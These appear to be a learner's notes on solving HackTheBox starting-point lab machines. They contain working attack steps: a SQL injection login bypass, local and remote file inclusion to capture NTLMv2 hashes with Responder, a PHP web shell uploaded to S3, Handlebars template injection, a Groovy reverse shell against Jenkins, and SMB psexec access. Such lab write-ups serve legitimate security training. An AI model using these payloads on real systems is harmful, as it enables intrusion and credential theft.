[Back](../HTBMachines.md)

# Table of Contents:

- [Appointment](#appointment)
- [Sequel](#sequel)
- [Crocodile](#crocodile)
- [Responder](#responder)
- [Three](#three)
- [Ignition](#ignition)
- [Bike](#bike)
- [Funnel](#funnel)
- [Pennyworth](#pennyworth)
- [Tactics](#tactics)


# Appointment

- `admin'#` - close the admin username string and start the comment

# Sequel

## Using nmap with NSE Scripts:

If you are using nmap, you can run a script to identify the MySQL version.

```bash
nmap -p 3306 --script mysql-info <target_ip>
```
- MariaDB
- `-u root`
- `mariadb -u root -P 3306 -h 10.129.81.33`

# Crocodile

- `nmap -sC -p21 <target_ip>`
- `nmap -sV -sC -p80,443 <target_ip>` - get Apache version
- connect to ftp server and download a files
- `gobuster dir -x php -w /usr/share/wordlists/dirb/small.txt -u <target_ip>`

>[!hint]
> all credential for login inside downloaded files

# Responder

- `nmap -sCV -Pn -vv --top-ports 66 --open <target_ip>`
- we get `NS_ERROR_UNKNOWN_HOST` or `ERR_NAME_NOT_RESOLVED` - this error indicates that the browser or application was unable to resolve the hostname (domain name) to an IP address
- add to `sudo vi etc/hosts` `<target_ip><tab or ^I><target_hostname>`

### Local File Inclusion

- `http://unika.htb/index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts`

>[!note] Can use more `../` to escape

### Remote File Inclusion

>[!hint] responder
> - [responder github](https://github.com/lgandx/Responder)
> - configuration in `etc/responder/Responder.conf`

- run responder on `tun0`
- `http://unika.htb/index.php?page=//<local_ip_or_hostname>/<file_name>`
- responder through `[SMB] NTLMv2-SSP Client   : <target_ip>`

>[!note] [NTLM](https://www.crowdstrike.com/en-us/cybersecurity-101/identity-protection/windows-ntlm/)

### Hash Cracking
- [john the ripper](https://github.com/openwall/john)
- get wordlist from `/usr/share/wordlists/rockyou.txt` (use `gunzip` to uncompress it)

```bash
john -w=/usr/share/wordlists/rockyou.txt <file_with_hash>
```

- use `netstat -ano` to find the port with which connection **ESTABLISHED**

# Three

- in *Contact* section find domain and add it to `etc/hosts`
- then use `gobuster` in VHOST enumeration mode

>[!attention] `--append-domain`
> Without this flag you need to include the full domain in your wordlist on every entry.

### AWS

>[!hint] `tldr aws`

- `aws configure` for initialization
- `aws s3 ls` to list buckets

```php
<?php system($_GET['cmd']); ?>
```

- copy shell file to S3 bucket: \
    `aws s3 cp --endpoint-url=http://s3.thetoppers.htb my_data/shells/shell.php s3://thetoppers.htb`

# Ignition

- `gobuster dir <url> -t 30 -w /usr/share/wordlists/dirb/small.txt -b 404,502`

- [admin password requirements](https://experienceleague.adobe.com/en/docs/commerce-admin/systems/security/security-admin)
- may use `wfuzz` for bruteforce

# Bike

>[!hint] SSTI Vulnerability

### Burpsuite
- intercept and replicate `{{7*7}}` input submission
- encode exploit from [hacktricks (handlebars)](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#handlebars-nodejs) in *Decode* tab.
- modify payload: [Deprecated mainModule](https://nodejs.org/api/process.html#processmainmodule)

# Funnel

- nmap and connect to ftp server
- read files and check which user hasn't changed default password
- connect via ssh
- brute force username with `crackmapexec`

>[!hint]
> - `mget` - download multiple files (ftp)
> - `/etc/services` - Network services, Internet style

- Local Port Forwarding: `ssh -L 2323:localhost:5432 christine@<target_ip>`
- connect using `psql` to forwarded port and start digging

# Pennyworth

- nmap open ports and fuzz directories with `ffuf` or `gobuster`
- to get Jenkins version use `whatweb` or check directories from fuzzing

## Reverse Shell

- Use [revsh](https://gist.githubusercontent.com/frohoff/fed1ffaab9b9beeb1c76/raw/7cfa97c7dc65e2275abfb378101a505bfb754a95/revsh.groovy)
- Change `localhost` to `<your_ip>`
- `cmd.exe` to `/bin/bash`
- Run port listener on your machine: `nc -lvnp <port>`
- Run Groovy reverse shell script
- Enter commands below `nc` and search for `flag.txt`

# Tactics

>[!hint] Try administrative usernames.

- `$` - character at the end of a share name indicates it's *an administrative share*

### Get flag via:
- `smbclient \\\\<ip_address>\\<sharename> -U <username>`
- `impacket-psexec <username>@<ip_address>`
- *metasploit meterpreter*
